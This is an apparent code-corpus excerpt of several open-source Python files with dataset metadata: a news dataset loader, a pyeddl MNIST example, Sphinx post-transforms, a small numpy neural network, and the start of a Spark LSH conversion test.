for entry in raw_docs[doc_id+1]["T"]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
title = Text(raw, tokenized)
raw, tokenized = "", list()
for category in ["A", "K", "W"]:
for entry in raw_docs[doc_id+1][category]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
content = Text(raw, tokenized)
documents.append(Document(doc_id+1, title, content, raw_docs[doc_id+1]["U"][0].raw))
self.documents = documents
def load_queries(self, filename):
pass
def load_relevant_docs(self, filename):
pass
# load the data
base_path = './data/local_news_data/baltimore_sun'
baltimore_sun_covid_data = BaltimoreSunCovidDataset(base_path)
baltimore_sun_covid_data.load_docs('BALTIMORE_SUN.ALL')
| 31.895522
| 96
| 0.552644
|
import os
import re
from collections import defaultdict
from nltk.tokenize import word_tokenize
from data.template import Dataset, Document, Text
class BaltimoreSunCovidDataset(Dataset):
def __init__(self, base_path):
self.base_path = base_path
self.documents = None
super().__init__()
def read_raw(self, filename):
docs = [defaultdict(list)]
category = ''
with open(os.path.join(self.base_path, filename)) as f:
i = 0
for line in f:
line = line.strip()
if line.startswith('.I'):
i = int(line[3:])
docs.append(defaultdict(list))
elif re.match(r'\.\w', line):
category = line[1]
elif line != '':
docs[i][category].append(Text(line, [word.lower()
for word in word_tokenize(line)]))
return docs
def load_docs(self, filename):
raw_docs = self.read_raw(filename)
documents = list()
for doc_id, _ in enumerate(raw_docs[1:]):
title, content = None, None
raw, tokenized = "", list()
for entry in raw_docs[doc_id+1]["T"]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
title = Text(raw, tokenized)
raw, tokenized = "", list()
for category in ["A", "K", "W"]:
for entry in raw_docs[doc_id+1][category]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
content = Text(raw, tokenized)
documents.append(Document(doc_id+1, title, content, raw_docs[doc_id+1]["U"][0].raw))
self.documents = documents
def load_queries(self, filename):
pass
def load_relevant_docs(self, filename):
pass
base_path = './data/local_news_data/baltimore_sun'
baltimore_sun_covid_data = BaltimoreSunCovidDataset(base_path)
baltimore_sun_covid_data.load_docs('BALTIMORE_SUN.ALL')
| true
| true
|
1c4240229e4a83fba94c99ce1dbe3f737b8b1fda
| 3,026
|
py
|
Python
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 8
|
2020-02-28T06:39:17.000Z
|
2022-02-01T09:59:51.000Z
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 26
|
2019-10-30T10:53:21.000Z
|
2022-02-17T08:56:37.000Z
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 4
|
2019-10-17T07:48:37.000Z
|
2022-02-03T10:04:37.000Z
|
# Copyright (c) 2019-2021 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""\
Basic MLP for MNIST with initializers.
"""
import argparse
import sys
import pyeddl.eddl as eddl
from pyeddl.tensor import Tensor
MEM_CHOICES = ("low_mem", "mid_mem", "full_mem")
def main(args):
eddl.download_mnist()
num_classes = 10
in_ = eddl.Input([784])
layer = in_
layer = eddl.ReLu(eddl.GlorotNormal(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.GlorotUniform(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.RandomNormal(eddl.Dense(layer, 1024)))
out = eddl.Softmax(eddl.Dense(layer, num_classes))
net = eddl.Model([in_], [out])
eddl.build(
net,
eddl.sgd(0.01, 0.9),
["soft_cross_entropy"],
["categorical_accuracy"],
eddl.CS_GPU(mem=args.mem) if args.gpu else eddl.CS_CPU(mem=args.mem)
)
eddl.summary(net)
eddl.plot(net, "model.pdf")
x_train = Tensor.load("mnist_trX.bin")
y_train = Tensor.load("mnist_trY.bin")
x_test = Tensor.load("mnist_tsX.bin")
y_test = Tensor.load("mnist_tsY.bin")
if args.small:
x_train = x_train.select([":6000"])
y_train = y_train.select([":6000"])
x_test = x_test.select([":1000"])
y_test = y_test.select([":1000"])
x_train.div_(255.0)
x_test.div_(255.0)
eddl.fit(net, [x_train], [y_train], args.batch_size, args.epochs)
eddl.evaluate(net, [x_test], [y_test], bs=args.batch_size)
print("All done")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--epochs", type=int, metavar="INT", default=10)
parser.add_argument("--batch-size", type=int, metavar="INT", default=1000)
parser.add_argument("--gpu", action="store_true")
parser.add_argument("--small", action="store_true")
parser.add_argument("--mem", metavar="|".join(MEM_CHOICES),
choices=MEM_CHOICES, default="low_mem")
main(parser.parse_args(sys.argv[1:]))
| 34.781609
| 79
| 0.692333
|
import argparse
import sys
import pyeddl.eddl as eddl
from pyeddl.tensor import Tensor
MEM_CHOICES = ("low_mem", "mid_mem", "full_mem")
def main(args):
eddl.download_mnist()
num_classes = 10
in_ = eddl.Input([784])
layer = in_
layer = eddl.ReLu(eddl.GlorotNormal(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.GlorotUniform(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.RandomNormal(eddl.Dense(layer, 1024)))
out = eddl.Softmax(eddl.Dense(layer, num_classes))
net = eddl.Model([in_], [out])
eddl.build(
net,
eddl.sgd(0.01, 0.9),
["soft_cross_entropy"],
["categorical_accuracy"],
eddl.CS_GPU(mem=args.mem) if args.gpu else eddl.CS_CPU(mem=args.mem)
)
eddl.summary(net)
eddl.plot(net, "model.pdf")
x_train = Tensor.load("mnist_trX.bin")
y_train = Tensor.load("mnist_trY.bin")
x_test = Tensor.load("mnist_tsX.bin")
y_test = Tensor.load("mnist_tsY.bin")
if args.small:
x_train = x_train.select([":6000"])
y_train = y_train.select([":6000"])
x_test = x_test.select([":1000"])
y_test = y_test.select([":1000"])
x_train.div_(255.0)
x_test.div_(255.0)
eddl.fit(net, [x_train], [y_train], args.batch_size, args.epochs)
eddl.evaluate(net, [x_test], [y_test], bs=args.batch_size)
print("All done")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--epochs", type=int, metavar="INT", default=10)
parser.add_argument("--batch-size", type=int, metavar="INT", default=1000)
parser.add_argument("--gpu", action="store_true")
parser.add_argument("--small", action="store_true")
parser.add_argument("--mem", metavar="|".join(MEM_CHOICES),
choices=MEM_CHOICES, default="low_mem")
main(parser.parse_args(sys.argv[1:]))
| true
| true
|
1c424050ab858e63b10d2aa80a83c2f500499ff2
| 9,734
|
py
|
Python
|
instruction_env/Lib/site-packages/sphinx/transforms/post_transforms/__init__.py
|
hanhtong/Effective-Instructions-
|
a1766f300c4e613b4ce10e9b6eae1b14e43c7d60
|
[
"MIT"
] | 3
|
2021-07-30T19:07:06.000Z
|
2021-08-28T19:35:40.000Z
|
instruction_env/Lib/site-packages/sphinx/transforms/post_transforms/__init__.py
|
hanhtong/Effective-Instructions-
|
a1766f300c4e613b4ce10e9b6eae1b14e43c7d60
|
[
"MIT"
] | 7
|
2020-12-04T04:10:42.000Z
|
2021-03-16T00:53:09.000Z
|
env/lib/python3.9/site-packages/sphinx/transforms/post_transforms/__init__.py
|
simotwo/AbileneParadox-ddd
|
c85961efb37aba43c0d99ed1c36d083507e2b2d3
|
[
"MIT"
] | 1
|
2021-01-20T01:58:53.000Z
|
2021-01-20T01:58:53.000Z
|
"""
sphinx.transforms.post_transforms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Docutils transforms used by Sphinx.
:copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from typing import Any, Dict, List, Optional, Tuple, Type, cast
from docutils import nodes
from docutils.nodes import Element
from sphinx import addnodes
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import process_only_nodes
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
"""A base class of post-transforms.
Post transforms are invoked to modify the document to restructure it for outputting.
They do resolving references, convert images, special transformation for each output
formats and so on. This class helps to implement these post transforms.
"""
builders = () # type: Tuple[str, ...]
formats = () # type: Tuple[str, ...]
def apply(self, **kwargs: Any) -> None:
if self.is_supported():
self.run(**kwargs)
def is_supported(self) -> bool:
"""Check this transform working for current builder."""
if self.builders and self.app.builder.name not in self.builders:
return False
if self.formats and self.app.builder.format not in self.formats:
return False
return True
def run(self, **kwargs: Any) -> None:
"""main method of post transforms.
Subclasses should override this method instead of ``apply()``.
"""
raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
"""
Resolves cross-references on doctrees.
"""
default_priority = 10
def run(self, **kwargs: Any) -> None:
for node in self.document.traverse(addnodes.pending_xref):
contnode = cast(nodes.TextElement, node[0].deepcopy())
newnode = None
typ = node['reftype']
target = node['reftarget']
refdoc = node.get('refdoc', self.env.docname)
domain = None
try:
if 'refdomain' in node and node['refdomain']:
# let the domain try to resolve the reference
try:
domain = self.env.domains[node['refdomain']]
except KeyError as exc:
raise NoUri(target, typ) from exc
newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
typ, target, node, contnode)
# really hardwired reference types
elif typ == 'any':
newnode = self.resolve_anyref(refdoc, node, contnode)
# no new node found? try the missing-reference event
if newnode is None:
newnode = self.app.emit_firstresult('missing-reference', self.env,
node, contnode,
allowed_exceptions=(NoUri,))
# still not found? warn if node wishes to be warned about or
# we are in nit-picky mode
if newnode is None:
self.warn_missing_reference(refdoc, typ, target, node, domain)
except NoUri:
newnode = contnode
node.replace_self(newnode or contnode)
def resolve_anyref(self, refdoc: str, node: pending_xref, contnode: Element) -> Element:
"""Resolve reference generated by the "any" role."""
stddomain = self.env.get_domain('std')
target = node['reftarget']
results = [] # type: List[Tuple[str, Element]]
# first, try resolving as :doc:
doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
'doc', target, node, contnode)
if doc_ref:
results.append(('doc', doc_ref))
# next, do the standard domain (makes this a priority)
results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
for domain in self.env.domains.values():
if domain.name == 'std':
continue # we did this one already
try:
results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
except NotImplementedError:
# the domain doesn't yet support the new interface
# we have to manually collect possible references (SLOW)
for role in domain.roles:
res = domain.resolve_xref(self.env, refdoc, self.app.builder,
role, target, node, contnode)
if res and isinstance(res[0], nodes.Element):
results.append(('%s:%s' % (domain.name, role), res))
# now, see how many matches we got...
if not results:
return None
if len(results) > 1:
def stringify(name: str, node: Element) -> str:
reftitle = node.get('reftitle', node.astext())
return ':%s:`%s`' % (name, reftitle)
candidates = ' or '.join(stringify(name, role) for name, role in results)
logger.warning(__('more than one target found for \'any\' cross-'
'reference %r: could be %s'), target, candidates,
location=node)
res_role, newnode = results[0]
# Override "any" class with the actual role type to get the styling
# approximately correct.
res_domain = res_role.split(':')[0]
if (len(newnode) > 0 and
isinstance(newnode[0], nodes.Element) and
newnode[0].get('classes')):
newnode[0]['classes'].append(res_domain)
newnode[0]['classes'].append(res_role.replace(':', '-'))
return newnode
def warn_missing_reference(self, refdoc: str, typ: str, target: str,
node: pending_xref, domain: Optional[Domain]) -> None:
warn = node.get('refwarn')
if self.config.nitpicky:
warn = True
if self.config.nitpick_ignore:
dtype = '%s:%s' % (domain.name, typ) if domain else typ
if (dtype, target) in self.config.nitpick_ignore:
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
(typ, target) in self.config.nitpick_ignore:
warn = False
if not warn:
return
if self.app.emit_firstresult('warn-missing-reference', domain, node):
return
elif domain and typ in domain.dangling_warnings:
msg = domain.dangling_warnings[typ]
elif node.get('refdomain', 'std') not in ('', 'std'):
msg = (__('%s:%s reference target not found: %%(target)s') %
(node['refdomain'], typ))
else:
msg = __('%r reference target not found: %%(target)s') % typ
logger.warning(msg % {'target': target},
location=node, type='ref', subtype=typ)
class OnlyNodeTransform(SphinxPostTransform):
default_priority = 50
def run(self, **kwargs: Any) -> None:
# A comment on the comment() nodes being inserted: replacing by [] would
# result in a "Losing ids" exception if there is a target node before
# the only node, so we make sure docutils can transfer the id to
# something, even if it's just a comment and will lose the id anyway...
process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
"""Fallback desc_sig_element nodes to inline if translator does not supported them."""
default_priority = 200
SIG_ELEMENTS = [addnodes.desc_sig_name,
addnodes.desc_sig_operator,
addnodes.desc_sig_punctuation]
def run(self, **kwargs: Any) -> None:
def has_visitor(translator: Type[nodes.NodeVisitor], node: Type[Element]) -> bool:
return hasattr(translator, "visit_%s" % node.__name__)
translator = self.app.builder.get_translator_class()
if isinstance(translator, SphinxTranslator):
# subclass of SphinxTranslator supports desc_sig_element nodes automatically.
return
if all(has_visitor(translator, node) for node in self.SIG_ELEMENTS):
# the translator supports all desc_sig_element nodes
return
else:
self.fallback()
def fallback(self) -> None:
for node in self.document.traverse(addnodes.desc_sig_element):
newnode = nodes.inline()
newnode.update_all_atts(node)
newnode.extend(node)
node.replace_self(newnode)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_post_transform(ReferencesResolver)
app.add_post_transform(OnlyNodeTransform)
app.add_post_transform(SigElementFallbackTransform)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
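# Illustrative sketch (not part of Sphinx): a minimal custom post-transform built on the
# SphinxPostTransform API documented above. An extension would register it the same way the
# built-in transforms are registered in setup(); the node type and priority chosen here are
# assumptions for illustration only.
class UppercaseLiteralsTransform(SphinxPostTransform):
    """Upper-case the text of inline literal nodes (demo of the post-transform hooks)."""

    default_priority = 700
    formats = ('html',)  # only run for HTML-like output formats

    def run(self, **kwargs: Any) -> None:
        for node in self.document.traverse(nodes.literal):
            node.replace_self(nodes.literal(text=node.astext().upper()))


def setup_example(app: Sphinx) -> Dict[str, Any]:
    app.add_post_transform(UppercaseLiteralsTransform)
    return {'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True}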
| 41.776824
| 92
| 0.581981
|
from typing import Any, Dict, List, Optional, Tuple, Type, cast
from docutils import nodes
from docutils.nodes import Element
from sphinx import addnodes
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import process_only_nodes
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
builders = ()
formats = ()
def apply(self, **kwargs: Any) -> None:
if self.is_supported():
self.run(**kwargs)
def is_supported(self) -> bool:
if self.builders and self.app.builder.name not in self.builders:
return False
if self.formats and self.app.builder.format not in self.formats:
return False
return True
def run(self, **kwargs: Any) -> None:
raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
default_priority = 10
def run(self, **kwargs: Any) -> None:
for node in self.document.traverse(addnodes.pending_xref):
contnode = cast(nodes.TextElement, node[0].deepcopy())
newnode = None
typ = node['reftype']
target = node['reftarget']
refdoc = node.get('refdoc', self.env.docname)
domain = None
try:
if 'refdomain' in node and node['refdomain']:
try:
domain = self.env.domains[node['refdomain']]
except KeyError as exc:
raise NoUri(target, typ) from exc
newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
typ, target, node, contnode)
elif typ == 'any':
newnode = self.resolve_anyref(refdoc, node, contnode)
if newnode is None:
newnode = self.app.emit_firstresult('missing-reference', self.env,
node, contnode,
allowed_exceptions=(NoUri,))
if newnode is None:
self.warn_missing_reference(refdoc, typ, target, node, domain)
except NoUri:
newnode = contnode
node.replace_self(newnode or contnode)
def resolve_anyref(self, refdoc: str, node: pending_xref, contnode: Element) -> Element:
stddomain = self.env.get_domain('std')
target = node['reftarget']
results = []
doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
'doc', target, node, contnode)
if doc_ref:
results.append(('doc', doc_ref))
results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
for domain in self.env.domains.values():
if domain.name == 'std':
continue
try:
results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
except NotImplementedError:
# we have to manually collect possible references (SLOW)
for role in domain.roles:
res = domain.resolve_xref(self.env, refdoc, self.app.builder,
role, target, node, contnode)
if res and isinstance(res[0], nodes.Element):
results.append(('%s:%s' % (domain.name, role), res))
# now, see how many matches we got...
if not results:
return None
if len(results) > 1:
def stringify(name: str, node: Element) -> str:
reftitle = node.get('reftitle', node.astext())
return ':%s:`%s`' % (name, reftitle)
candidates = ' or '.join(stringify(name, role) for name, role in results)
logger.warning(__('more than one target found for \'any\' cross-'
'reference %r: could be %s'), target, candidates,
location=node)
res_role, newnode = results[0]
# Override "any" class with the actual role type to get the styling
# approximately correct.
res_domain = res_role.split(':')[0]
if (len(newnode) > 0 and
isinstance(newnode[0], nodes.Element) and
newnode[0].get('classes')):
newnode[0]['classes'].append(res_domain)
newnode[0]['classes'].append(res_role.replace(':', '-'))
return newnode
def warn_missing_reference(self, refdoc: str, typ: str, target: str,
node: pending_xref, domain: Optional[Domain]) -> None:
warn = node.get('refwarn')
if self.config.nitpicky:
warn = True
if self.config.nitpick_ignore:
dtype = '%s:%s' % (domain.name, typ) if domain else typ
if (dtype, target) in self.config.nitpick_ignore:
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
(typ, target) in self.config.nitpick_ignore:
warn = False
if not warn:
return
if self.app.emit_firstresult('warn-missing-reference', domain, node):
return
elif domain and typ in domain.dangling_warnings:
msg = domain.dangling_warnings[typ]
elif node.get('refdomain', 'std') not in ('', 'std'):
msg = (__('%s:%s reference target not found: %%(target)s') %
(node['refdomain'], typ))
else:
msg = __('%r reference target not found: %%(target)s') % typ
logger.warning(msg % {'target': target},
location=node, type='ref', subtype=typ)
class OnlyNodeTransform(SphinxPostTransform):
default_priority = 50
def run(self, **kwargs: Any) -> None:
# A comment on the comment() nodes being inserted: replacing by [] would
# result in a "Losing ids" exception if there is a target node before
# the only node, so we make sure docutils can transfer the id to
# something, even if it's just a comment and will lose the id anyway...
process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
default_priority = 200
SIG_ELEMENTS = [addnodes.desc_sig_name,
addnodes.desc_sig_operator,
addnodes.desc_sig_punctuation]
def run(self, **kwargs: Any) -> None:
def has_visitor(translator: Type[nodes.NodeVisitor], node: Type[Element]) -> bool:
return hasattr(translator, "visit_%s" % node.__name__)
translator = self.app.builder.get_translator_class()
if isinstance(translator, SphinxTranslator):
return
if all(has_visitor(translator, node) for node in self.SIG_ELEMENTS):
return
else:
self.fallback()
def fallback(self) -> None:
for node in self.document.traverse(addnodes.desc_sig_element):
newnode = nodes.inline()
newnode.update_all_atts(node)
newnode.extend(node)
node.replace_self(newnode)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_post_transform(ReferencesResolver)
app.add_post_transform(OnlyNodeTransform)
app.add_post_transform(SigElementFallbackTransform)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
| true
| true
|
1c42409c2dcd2bc7895d7d82bdf7f199c13bfae3
| 4,020
|
py
|
Python
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-02-07T11:10:39.000Z
|
2018-02-07T11:10:39.000Z
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-02-07T11:10:31.000Z
|
2018-02-07T11:10:31.000Z
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-03-11T15:07:10.000Z
|
2018-03-11T15:07:10.000Z
|
import numpy as np
# Artificial Neural Network
class ANN:
def __init__(self, layer_size_list):
self.input_size = layer_size_list[0]
self.hidden_output_layer = []
self.cost_result = []
self.accuracy_result = []
for layer_index in range(1, len(layer_size_list)):
self.hidden_output_layer.append( NNlayer( layer_size_list[layer_index - 1], layer_size_list[layer_index], self.sigmoid, self.de_sigmoid ) )
def propagate_result(self, network_input, save_result = False):
previous_output = [network_input]
for layer in self.hidden_output_layer:
previous_output = layer.CalculateOutput(previous_output,save_data = save_result)
return previous_output
    def mini_batch_training(self, training_data, batch_size, learning_rate = 0.3, total_epoch = 500): # batch_size should be an integer
total_num_training_data = len(training_data)
total_iterations = total_num_training_data // batch_size
np.random.shuffle(training_data)
for z in range(total_epoch):
success_total = 0
cost_total = 0
temp_batch = 0
for i in range(total_iterations):
index = batch_size * i
success, cost = self.batch_SGD(training_data[index:index+batch_size],learning_rate)
temp_batch = len(training_data[index:index+batch_size])
success_total += success
cost_total += cost
self.cost_result.append( cost_total/(temp_batch*total_iterations) )
self.accuracy_result.append( success_total/(temp_batch*total_iterations) )
print("epoch:", z+1, "out of", total_epoch,"| Accuracy:", success_total/(temp_batch*total_iterations))
def batch_SGD(self,training_data,learning_rate):
batch_size = len(training_data)
correct = 0.0
costTot = 0.0
for data in training_data:
network_result = self.propagate_result(data[0],save_result = True)
if np.argmax(network_result) == np.argmax(data[1]):
correct += 1.0
d_cost = network_result - [data[1]]
costTot+=0.5 * np.sum( (d_cost)**2 )
self.backpropagate_result(d_cost)
self.update_layers(batch_size, learning_rate)
return correct, costTot
def update_layers(self, batch_size, learning_rate):
for layer in self.hidden_output_layer:
layer.update_constants(learning_rate, batch_size)
def backpropagate_result(self, d_cost):
final_derivative = d_cost
for layer in reversed(self.hidden_output_layer):
final_derivative = layer.backpropagate_layer(final_derivative)
def sigmoid(self, x): return 1/(1+np.exp(-x))
def de_sigmoid(self, x): return self.sigmoid(x) * ( 1 - self.sigmoid(x) )
class NNlayer:
def __init__(self, previous_nodes, current_nodes, activating_function, derivative_function):
self.weightArr = np.random.random((previous_nodes,current_nodes))*2-1
self.biasArr = np.random.random((1,current_nodes))*2-1
self.activating_function = activating_function # must be iterative
self.derivative_function = derivative_function # must be iterative
self.bias_G_sum = np.copy(self.biasArr) * 0
self.weight_G_sum = np.copy(self.weightArr) * 0
def CalculateOutput(self, previous_layer_output, save_data = False):
pre_activating = np.dot(previous_layer_output, self.weightArr) + self.biasArr
if save_data:
self.derivative_activation = self.derivative_function( pre_activating )
self.previous_layer_output = np.array(previous_layer_output)
return self.activating_function( pre_activating )
def backpropagate_layer(self, next_layer):
bias_G = next_layer * self.derivative_activation
        weight_G = np.dot( self.previous_layer_output.T, bias_G )
self.bias_G_sum += bias_G
self.weight_G_sum += weight_G
return np.dot( bias_G, self.weightArr.T )
def update_constants(self, learning_rate, batch_size):
self.weightArr -= learning_rate * self.weight_G_sum / batch_size
self.biasArr -= learning_rate * self.bias_G_sum / batch_size
gradient_magnitude = np.linalg.norm(self.bias_G_sum / batch_size) + np.linalg.norm(self.weight_G_sum / batch_size)
self.bias_G_sum *= 0
self.weight_G_sum *= 0
return gradient_magnitude
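# Illustrative usage sketch (not from the original repository): trains the ANN above on tiny
# synthetic data. The layer sizes, batch size, learning rate and the random
# (input, one-hot target) pairs are illustrative assumptions only.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    inputs = rng.rand(20, 4)                          # 20 samples, 4 features each
    labels = rng.randint(0, 3, size=20)               # 3 classes
    training_data = [(inputs[i], np.eye(3)[labels[i]]) for i in range(20)]
    net = ANN([4, 8, 3])                              # 4 inputs, one hidden layer of 8, 3 outputs
    net.mini_batch_training(training_data, batch_size=5, learning_rate=0.5, total_epoch=3)
    print(net.propagate_result(inputs[0]))            # class scores for the first sample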
| 42.315789
| 142
| 0.765672
|
import numpy as np
class ANN:
def __init__(self, layer_size_list):
self.input_size = layer_size_list[0]
self.hidden_output_layer = []
self.cost_result = []
self.accuracy_result = []
for layer_index in range(1, len(layer_size_list)):
self.hidden_output_layer.append( NNlayer( layer_size_list[layer_index - 1], layer_size_list[layer_index], self.sigmoid, self.de_sigmoid ) )
def propagate_result(self, network_input, save_result = False):
previous_output = [network_input]
for layer in self.hidden_output_layer:
previous_output = layer.CalculateOutput(previous_output,save_data = save_result)
return previous_output
def mini_batch_training(self, training_data, batch_size, learning_rate = 0.3, total_epoch = 500):
total_num_training_data = len(training_data)
total_iterations = total_num_training_data // batch_size
np.random.shuffle(training_data)
for z in range(total_epoch):
success_total = 0
cost_total = 0
temp_batch = 0
for i in range(total_iterations):
index = batch_size * i
success, cost = self.batch_SGD(training_data[index:index+batch_size],learning_rate)
temp_batch = len(training_data[index:index+batch_size])
success_total += success
cost_total += cost
self.cost_result.append( cost_total/(temp_batch*total_iterations) )
self.accuracy_result.append( success_total/(temp_batch*total_iterations) )
print("epoch:", z+1, "out of", total_epoch,"| Accuracy:", success_total/(temp_batch*total_iterations))
def batch_SGD(self,training_data,learning_rate):
batch_size = len(training_data)
correct = 0.0
costTot = 0.0
for data in training_data:
network_result = self.propagate_result(data[0],save_result = True)
if np.argmax(network_result) == np.argmax(data[1]):
correct += 1.0
d_cost = network_result - [data[1]]
costTot+=0.5 * np.sum( (d_cost)**2 )
self.backpropagate_result(d_cost)
self.update_layers(batch_size, learning_rate)
return correct, costTot
def update_layers(self, batch_size, learning_rate):
for layer in self.hidden_output_layer:
layer.update_constants(learning_rate, batch_size)
def backpropagate_result(self, d_cost):
final_derivative = d_cost
for layer in reversed(self.hidden_output_layer):
final_derivative = layer.backpropagate_layer(final_derivative)
def sigmoid(self, x): return 1/(1+np.exp(-x))
def de_sigmoid(self, x): return self.sigmoid(x) * ( 1 - self.sigmoid(x) )
class NNlayer:
def __init__(self, previous_nodes, current_nodes, activating_function, derivative_function):
self.weightArr = np.random.random((previous_nodes,current_nodes))*2-1
self.biasArr = np.random.random((1,current_nodes))*2-1
self.activating_function = activating_function
self.derivative_function = derivative_function
self.bias_G_sum = np.copy(self.biasArr) * 0
self.weight_G_sum = np.copy(self.weightArr) * 0
def CalculateOutput(self, previous_layer_output, save_data = False):
pre_activating = np.dot(previous_layer_output, self.weightArr) + self.biasArr
if save_data:
self.derivative_activation = self.derivative_function( pre_activating )
self.previous_layer_output = np.array(previous_layer_output)
return self.activating_function( pre_activating )
def backpropagate_layer(self, next_layer):
bias_G = next_layer * self.derivative_activation
        weight_G = np.dot( self.previous_layer_output.T, bias_G )
self.bias_G_sum += bias_G
self.weight_G_sum += weight_G
return np.dot( bias_G, self.weightArr.T )
def update_constants(self, learning_rate, batch_size):
self.weightArr -= learning_rate * self.weight_G_sum / batch_size
self.biasArr -= learning_rate * self.bias_G_sum / batch_size
gradient_magnitude = np.linalg.norm(self.bias_G_sum / batch_size) + np.linalg.norm(self.weight_G_sum / batch_size)
self.bias_G_sum *= 0
self.weight_G_sum *= 0
return gradient_magnitude
| true
| true
|
1c4240c3a65bca5c805f1ae7a103998ad6bb6f55
| 2,212
|
py
|
Python
|
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
# SPDX-License-Identifier: Apache-2.0
import sys
import unittest
import pandas
import numpy
from pyspark.ml.feature import BucketedRandomProjectionLSH
from pyspark.ml.linalg import Vectors
from onnxmltools import convert_sparkml
from onnxmltools.convert.common.data_types import FloatTensorType
from tests.sparkml.sparkml_test_utils import save_data_models, run_onnx_model, compare_results
from tests.sparkml import SparkMlTestCase
class TestBucketedRandomProjectionLSH(SparkMlTestCase):
@unittest.skipIf(sys.platform == 'win32',
reason="UnsatisfiedLinkError")
@unittest.skipIf(sys.version_info < (3, 8),
reason="pickle fails on python 3.7")
def test_bucketed_random_projection_lsh(self):
data = self.spark.createDataFrame([
(0, Vectors.dense([-1.0, -1.0 ]),),
(1, Vectors.dense([-1.0, 1.0 ]),),
(2, Vectors.dense([1.0, -1.0 ]),),
(3, Vectors.dense([1.0, 1.0]),)
